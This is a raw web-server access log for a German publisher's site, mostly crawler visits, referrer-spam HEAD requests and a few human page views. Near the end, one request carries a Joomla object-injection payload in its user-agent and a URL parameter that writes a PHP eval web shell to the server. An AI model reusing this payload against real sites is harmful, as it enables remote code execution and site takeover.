195.133.145.199 - - [08/Apr/2017:15:32:31 +0200] "HEAD / HTTP/1.1" 200 - "http://taromir.ru/news/denezhnyj_zagovor/2017-02-23-779" "Mozilla/8.0 (compatible; MSIE6.00; Windows 2005)"
193.124.131.168 - - [08/Apr/2017:15:33:53 +0200] "HEAD / HTTP/1.1" 200 - "https://ukrsmeta.ua/snip-stroitelnye-normy-i-pravila/" "Mozilla/3.0 (compatible; MSIE4.00; Windows 2002)"
195.133.48.150 - - [08/Apr/2017:15:34:16 +0200] "HEAD / HTTP/1.1" 200 - "https://anapa777.ru/rooms" "Mozilla/2.0 (compatible; MSIE7.00; Windows 2006)"
40.77.167.88 - - [08/Apr/2017:15:35:34 +0200] "GET /buecher/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
194.87.238.17 - - [08/Apr/2017:15:39:57 +0200] "HEAD / HTTP/1.1" 200 - "https://ledgoods.ru/outdoor/outdoor_lights/svetilnik-sadovo-parkovyj-60w-230v-e27-ip44-chernoe-zoloto-pl4046-11426.html" "Mozilla/5.0 (compatible; MSIE7.00; Windows 2008)"
195.133.147.74 - - [08/Apr/2017:15:42:47 +0200] "HEAD / HTTP/1.1" 200 - "http://www.rendstroy.ru/TechInfo/" "Mozilla/7.0 (compatible; MSIE7.00; Windows 2003)"
195.133.147.89 - - [08/Apr/2017:15:43:23 +0200] "HEAD / HTTP/1.1" 200 - "http://baikalyachts.com/news-shipyard/325-itogi-goda-2016.html" "Mozilla/4.0 (compatible; MSIE7.00; Windows 2008)"
194.87.234.246 - - [08/Apr/2017:15:50:59 +0200] "HEAD / HTTP/1.1" 200 - "https://taximoskvi.ru/otzivi.html" "Mozilla/6.0 (compatible; MSIE7.00; Windows 2008)"
195.133.147.6 - - [08/Apr/2017:15:54:42 +0200] "HEAD / HTTP/1.1" 200 - "https://www.tattooreligion.ru/permanentnyj-makijazh-vek" "Mozilla/6.0 (compatible; MSIE6.00; Windows 2007)"
77.220.213.173 - - [08/Apr/2017:16:20:01 +0200] "HEAD / HTTP/1.1" 200 - "http://oldtownestate.eu/" "Mozilla/7.0 (compatible; MSIE4.00; Windows 2002)"
178.159.39.237 - - [08/Apr/2017:16:20:01 +0200] "HEAD / HTTP/1.1" 200 - "http://dengi-v-kredit.in.ua/de-vzyati-kredit-gotivkoyu-u-xarkovi/" "Mozilla/3.0 (compatible; MSIE4.00; Windows 2009)"
185.154.13.6 - - [08/Apr/2017:16:20:01 +0200] "HEAD / HTTP/1.1" 200 - "https://petboy.ru/products/25937550" "Mozilla/3.0 (compatible; MSIE4.00; Windows 2008)"
178.159.43.212 - - [08/Apr/2017:16:24:33 +0200] "HEAD / HTTP/1.1" 200 - "https://nochuem.ru" "Mozilla/6.0 (compatible; MSIE4.00; Windows 2008)"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /cds/hymnos_akathistos.html HTTP/1.1" 200 11061 "https://www.google.at/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /cds/hymnos.jpg HTTP/1.1" 200 27752 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /main.css HTTP/1.1" 200 1439 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /logo_g.gif HTTP/1.1" 200 1301 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /mv_g.gif HTTP/1.1" 200 4070 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /m.gif HTTP/1.1" 200 95 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /pf.gif HTTP/1.1" 200 62 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /cds/hymnos_heft.jpg HTTP/1.1" 200 8653 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /strich.gif HTTP/1.1" 200 45 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
62.46.178.176 - - [08/Apr/2017:16:39:22 +0200] "GET /favicon.ico HTTP/1.1" 200 4286 "http://www.morusverlag.de/cds/hymnos_akathistos.html" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8"
40.77.167.88 - - [08/Apr/2017:16:46:45 +0200] "GET /sonderthemen/sk2004_s01.pdf HTTP/1.1" 200 162742 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
5.9.106.81 - - [08/Apr/2017:16:55:58 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11"
5.9.94.207 - - [08/Apr/2017:17:31:44 +0200] "GET /sonderthemen/az1999.pdf HTTP/1.1" 200 1842982 "-" "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20100101 Firefox/19.0"
5.9.106.81 - - [08/Apr/2017:17:31:44 +0200] "GET /sonderthemen/sk2002.pdf HTTP/1.1" 200 2628923 "-" "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20120403211507 Firefox/12.0"
5.9.112.6 - - [08/Apr/2017:17:31:44 +0200] "GET /sonderthemen/oekz2003.pdf HTTP/1.1" 200 4017017 "-" "Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1"
78.46.156.169 - - [08/Apr/2017:17:31:58 +0200] "GET /sonderthemen/az1999.pdf HTTP/1.1" 200 1842982 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.58.2 (KHTML, like Gecko) Version/5.1.8 Safari/534.58.2"
5.9.145.132 - - [08/Apr/2017:17:32:13 +0200] "GET /sonderthemen/az1999.pdf HTTP/1.1" 200 1842982 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19"
78.46.156.169 - - [08/Apr/2017:18:12:55 +0200] "GET /sonderthemen/az2000.pdf HTTP/1.1" 200 2253581 "-" "Mozilla/5.0 (X11; Linux i686; rv:21.0) Gecko/20100101 Firefox/21.0"
68.180.230.44 - - [08/Apr/2017:18:17:09 +0200] "GET /sonderthemen/archiv.html HTTP/1.1" 200 6959 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
85.25.210.41 - - [08/Apr/2017:18:19:51 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
85.25.210.41 - - [08/Apr/2017:18:19:51 +0200] "GET /jahrbuch/titelseiten/2010.jpg HTTP/1.1" 200 9104 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
40.77.167.117 - - [08/Apr/2017:18:32:51 +0200] "GET /jahrbuch/index.html HTTP/1.1" 200 3956 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
62.138.0.25 - - [08/Apr/2017:18:48:28 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:18:48:28 +0200] "GET /jahrbuch/titelseiten/2005.jpg HTTP/1.1" 200 11448 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
195.133.145.199 - - [08/Apr/2017:19:00:21 +0200] "HEAD / HTTP/1.1" 200 - "http://taromir.ru/news/poterja_talismana/2016-12-21-420" "Mozilla/8.0 (compatible; MSIE3.00; Windows 2007)"
194.87.238.17 - - [08/Apr/2017:19:00:50 +0200] "HEAD / HTTP/1.1" 200 - "https://ledgoods.ru/business/lamps/lampa-metallogalogennaya-mgl-150vt-hqi-ts-150w-wdl-excel-rx7s-24-fs1-678362.html" "Mozilla/7.0 (compatible; MSIE4.00; Windows 2004)"
195.133.147.74 - - [08/Apr/2017:19:05:50 +0200] "HEAD / HTTP/1.1" 200 - "http://www.rendstroy.ru/contacts/" "Mozilla/3.0 (compatible; MSIE6.00; Windows 2004)"
195.133.48.150 - - [08/Apr/2017:19:06:22 +0200] "HEAD / HTTP/1.1" 200 - "https://anapa777.ru/photo/anapa" "Mozilla/7.0 (compatible; MSIE6.00; Windows 2003)"
193.124.131.168 - - [08/Apr/2017:19:10:12 +0200] "HEAD / HTTP/1.1" 200 - "https://ukrsmeta.ua/yak-sklasti-koshtoris-na-ozdoblyuvalni-roboti/" "Mozilla/5.0 (compatible; MSIE6.00; Windows 2003)"
195.133.147.89 - - [08/Apr/2017:19:16:04 +0200] "HEAD / HTTP/1.1" 200 - "http://baikalyachts.com/" "Mozilla/3.0 (compatible; MSIE4.00; Windows 2006)"
5.9.17.118 - - [08/Apr/2017:19:16:59 +0200] "GET /sonderthemen/oekt_extra1.pdf HTTP/1.1" 200 1849015 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20130331 Firefox/21.0"
157.55.39.8 - - [08/Apr/2017:19:23:54 +0200] "GET /buecher/rezensionen_engel.html HTTP/1.1" 200 6598 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
5.9.17.118 - - [08/Apr/2017:19:32:28 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "Mozilla/5.0 (Windows NT 6.1; de;rv:12.0) Gecko/20120403211507 Firefox/12.0"
136.243.83.16 - - [08/Apr/2017:19:38:09 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; MetaJobBot; http://www.metajob.de/crawler)"
136.243.83.16 - - [08/Apr/2017:19:38:09 +0200] "GET /buecher/veroeffentlichungsliste.html HTTP/1.1" 200 129779 "-" "Mozilla/5.0 (compatible; MetaJobBot; http://www.metajob.de/crawler)"
136.243.83.16 - - [08/Apr/2017:19:38:18 +0200] "GET /buecher/rezensionen_chateaubriand.html HTTP/1.1" 200 47317 "-" "Mozilla/5.0 (compatible; MetaJobBot; http://www.metajob.de/crawler)"
136.243.83.16 - - [08/Apr/2017:19:38:26 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "Mozilla/5.0 (compatible; MetaJobBot; http://www.metajob.de/crawler)"
194.87.234.246 - - [08/Apr/2017:19:41:34 +0200] "HEAD / HTTP/1.1" 200 - "https://taximoskvi.ru/zagorod.html" "Mozilla/4.0 (compatible; MSIE3.00; Windows 2008)"
195.133.147.6 - - [08/Apr/2017:19:48:08 +0200] "HEAD / HTTP/1.1" 200 - "https://www.tattooreligion.ru/obuchenie-tatuazhu" "Mozilla/2.0 (compatible; MSIE6.00; Windows 2007)"
157.55.39.116 - - [08/Apr/2017:19:58:55 +0200] "GET /jahrbuch/bestellung.php HTTP/1.1" 200 10316 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.66.232 - - [08/Apr/2017:20:00:27 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.232 - - [08/Apr/2017:20:00:27 +0200] "GET /index.html HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.138.0.25 - - [08/Apr/2017:20:04:59 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
62.138.0.25 - - [08/Apr/2017:20:04:59 +0200] "GET /jahrbuch/titelseiten/1989.jpg HTTP/1.1" 200 9555 "-" "Mozilla/5.0 (compatible; seoscanners.net/1; +spider@seoscanners.net)"
66.249.66.228 - - [08/Apr/2017:20:08:23 +0200] "GET /impressum.html HTTP/1.1" 200 2808 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.224 - - [08/Apr/2017:20:12:55 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.57 - - [08/Apr/2017:20:14:20 +0200] "GET /cds/index.html HTTP/1.1" 200 7987 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
177.139.245.101 - - [08/Apr/2017:20:16:41 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36"
66.249.76.56 - - [08/Apr/2017:20:20:30 +0200] "GET /kontakt/index.html HTTP/1.1" 200 2896 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.58 - - [08/Apr/2017:20:26:23 +0200] "GET /jahrbuch/index.html HTTP/1.1" 200 3956 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.159.39.237 - - [08/Apr/2017:20:31:19 +0200] "HEAD / HTTP/1.1" 200 - "http://dengi-v-kredit.in.ua/uk/yak-shvidko-viddati-krediti/" "Mozilla/7.0 (compatible; MSIE3.00; Windows 2006)"
185.154.13.6 - - [08/Apr/2017:20:31:27 +0200] "HEAD / HTTP/1.1" 200 - "https://petboy.ru/products/25679341" "Mozilla/2.0 (compatible; MSIE3.00; Windows 2003)"
77.220.213.173 - - [08/Apr/2017:20:31:27 +0200] "HEAD / HTTP/1.1" 200 - "http://oldtownestate.eu/ru/About/Residence/" "Mozilla/2.0 (compatible; MSIE2.00; Windows 2007)"
66.249.76.56 - - [08/Apr/2017:20:31:55 +0200] "GET /gotteslob/index.html HTTP/1.1" 200 2770 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.228 - - [08/Apr/2017:20:37:29 +0200] "GET /buecher/bestellung.php HTTP/1.1" 200 10142 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.57 - - [08/Apr/2017:20:43:04 +0200] "GET /sonderthemen/index.html HTTP/1.1" 200 7102 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
178.159.43.212 - - [08/Apr/2017:20:44:53 +0200] "HEAD / HTTP/1.1" 200 - "https://kazan.nochuem.ru" "Mozilla/3.0 (compatible; MSIE5.00; Windows 2008)"
157.55.39.116 - - [08/Apr/2017:20:46:26 +0200] "GET /sonderthemen/archiv.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
66.249.76.57 - - [08/Apr/2017:20:48:32 +0200] "GET /buecher/diskussion.html HTTP/1.1" 200 9925 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.56 - - [08/Apr/2017:20:54:10 +0200] "GET /buecher/veroeffentlichungsliste.html HTTP/1.1" 200 129779 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.56 - - [08/Apr/2017:20:59:43 +0200] "GET /buecher/rezensionen_chateaubriand.html HTTP/1.1" 200 47317 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.58 - - [08/Apr/2017:21:05:26 +0200] "GET /buecher/rezension_gesichter_u_geschichten.pdf HTTP/1.1" 200 223287 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.255.251.7 - - [08/Apr/2017:21:07:26 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
5.255.251.7 - - [08/Apr/2017:21:07:29 +0200] "GET /cds/hymnos_k.jpg HTTP/1.1" 200 4986 "-" "Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)"
81.209.177.168 - - [08/Apr/2017:21:07:31 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "iBusiness Shopcrawler"
81.209.177.168 - - [08/Apr/2017:21:07:31 +0200] "GET / HTTP/1.1" 200 9360 "-" "iBusiness Shopcrawler"
81.209.177.168 - - [08/Apr/2017:21:07:31 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "iBusiness Shopcrawler"
81.209.177.168 - - [08/Apr/2017:21:07:31 +0200] "GET /buecher/rezensionen_chateaubriand.html HTTP/1.1" 200 47317 "-" "iBusiness Shopcrawler"
81.209.177.168 - - [08/Apr/2017:21:07:32 +0200] "GET /buecher/veroeffentlichungsliste.html HTTP/1.1" 200 129779 "-" "iBusiness Shopcrawler"
81.209.177.168 - - [08/Apr/2017:21:07:35 +0200] "GET /cds/hymnos_akathistos.html HTTP/1.1" 200 11061 "-" "iBusiness Shopcrawler"
40.77.167.88 - - [08/Apr/2017:21:11:41 +0200] "GET /jahrbuch/bestellung.php HTTP/1.1" 200 10316 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
180.76.15.18 - - [08/Apr/2017:21:23:36 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
180.76.15.155 - - [08/Apr/2017:21:23:52 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
157.55.39.8 - - [08/Apr/2017:21:39:09 +0200] "GET /kontakt/index.html HTTP/1.1" 200 2896 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
88.99.27.172 - - [08/Apr/2017:21:44:24 +0200] "GET /buecher/ HTTP/1.1" 200 25885 "-" "Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20130331 Firefox/21.0"
5.9.112.6 - - [08/Apr/2017:21:44:25 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.50.2 (KHTML, like Gecko) Version/5.0.6 Safari/533.22.3"
5.9.145.132 - - [08/Apr/2017:21:44:39 +0200] "GET /buecher/ HTTP/1.1" 200 25885 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31"
66.249.66.228 - - [08/Apr/2017:22:10:18 +0200] "GET /cds/ignatius.html HTTP/1.1" 200 6576 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
40.77.167.70 - - [08/Apr/2017:22:15:38 +0200] "GET /cds/index.html HTTP/1.1" 200 7987 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
66.249.76.57 - - [08/Apr/2017:22:18:57 +0200] "GET /cds/rosarium.html HTTP/1.1" 200 6680 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.58 - - [08/Apr/2017:22:25:35 +0200] "GET /buecher/index.html HTTP/1.1" 200 25885 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
194.87.238.17 - - [08/Apr/2017:22:30:01 +0200] "HEAD / HTTP/1.1" 200 - "https://ledgoods.ru/home/bulbs/lampa-lyuminestsentnaya-kompakt-spc-25-26vt-e27-4000k-kosmos-lksmt2spc26we2742-lksmt2spc25we2742.html" "Mozilla/2.0 (compatible; MSIE4.00; Windows 2007)"
195.133.145.199 - - [08/Apr/2017:22:30:01 +0200] "HEAD / HTTP/1.1" 200 - "http://taromir.ru/news/ritual_osvobozhdenija/2017-01-27-587" "Mozilla/8.0 (compatible; MSIE5.00; Windows 2005)"
66.249.76.58 - - [08/Apr/2017:22:32:11 +0200] "GET /cds/hymnos_akathistos.html HTTP/1.1" 200 11061 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
195.133.147.74 - - [08/Apr/2017:22:35:24 +0200] "HEAD / HTTP/1.1" 200 - "http://www.rendstroy.ru/e-store/44/4596/" "Mozilla/7.0 (compatible; MSIE7.00; Windows 2003)"
195.133.48.150 - - [08/Apr/2017:22:37:50 +0200] "HEAD / HTTP/1.1" 200 - "https://anapa777.ru/faq/1623-seaview" "Mozilla/6.0 (compatible; MSIE4.00; Windows 2007)"
5.255.251.7 - - [08/Apr/2017:22:39:05 +0200] "GET /key/ASWD56425CSA HTTP/1.1" 404 2381 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
195.133.147.89 - - [08/Apr/2017:22:50:05 +0200] "HEAD / HTTP/1.1" 200 - "http://baikalyachts.com/" "Mozilla/5.0 (compatible; MSIE5.00; Windows 2005)"
93.228.237.120 - - [08/Apr/2017:22:50:53 +0200] "GET /impressum.html HTTP/1.1" 200 2808 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
5.196.87.47 - - [08/Apr/2017:23:02:53 +0200] "GET /robots.txt HTTP/1.1" 200 100 "-" "Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)"
78.46.156.169 - - [08/Apr/2017:23:06:58 +0200] "GET /sonderthemen/az1999.pdf HTTP/1.1" 200 1842982 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 107) AppleWebKit/534.48.3 (KHTML like Gecko) Version/5.1 Safari/534.48.3"
80.130.92.168 - - [08/Apr/2017:23:08:28 +0200] "GET /buecher/gesichter/10.jpg HTTP/1.1" 200 7686 "https://www.bing.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
157.55.39.30 - - [08/Apr/2017:23:15:16 +0200] "GET /buecher/rezension_gesichter_u_geschichten.pdf HTTP/1.1" 200 223287 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
5.9.94.207 - - [08/Apr/2017:23:19:33 +0200] "GET /sonderthemen/az1999.pdf HTTP/1.1" 200 1842982 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1"
85.214.243.209 - - [08/Apr/2017:23:53:33 +0200] "GET / HTTP/1.1" 200 9360 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C)"
157.55.39.30 - - [08/Apr/2017:23:57:29 +0200] "GET /cds/lumina.html HTTP/1.1" 200 9000 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.30 - - [09/Apr/2017:00:17:55 +0200] "GET /buecher/rezensionen_christliche_frauen HTTP/1.1" 404 2381 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.73 - - [09/Apr/2017:00:43:30 +0200] "GET /buecher/rezensionen_chateaubriand.html HTTP/1.1" 200 47317 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.118 - - [09/Apr/2017:00:58:02 +0200] "GET /cds/simplay_control.swf HTTP/1.1" 200 1243 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.118 - - [09/Apr/2017:00:58:02 +0200] "GET /cds/simplay_player.swf?audiofile=lumina.mp3 HTTP/1.1" 200 6377 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.63 - - [09/Apr/2017:00:58:40 +0200] "GET /cds/lumina.jpg HTTP/1.1" 200 31150 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.63 - - [09/Apr/2017:00:58:45 +0200] "GET /m.gif HTTP/1.1" 200 95 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.63 - - [09/Apr/2017:00:58:48 +0200] "GET /strich.gif HTTP/1.1" 200 45 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
192.187.109.242 - - [09/Apr/2017:01:06:41 +0200] "GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 404 2381 "-" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:46:\"eval($_REQUEST[1]);JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
195.133.145.199 - - [09/Apr/2017:01:11:39 +0200] "HEAD / HTTP/1.1" 200 - "https://gantbpm.ru/finansirovanie-proektov-osnovnye-terminy/" "Mozilla/4.0 (compatible; MSIE2.00; Windows 2007)"
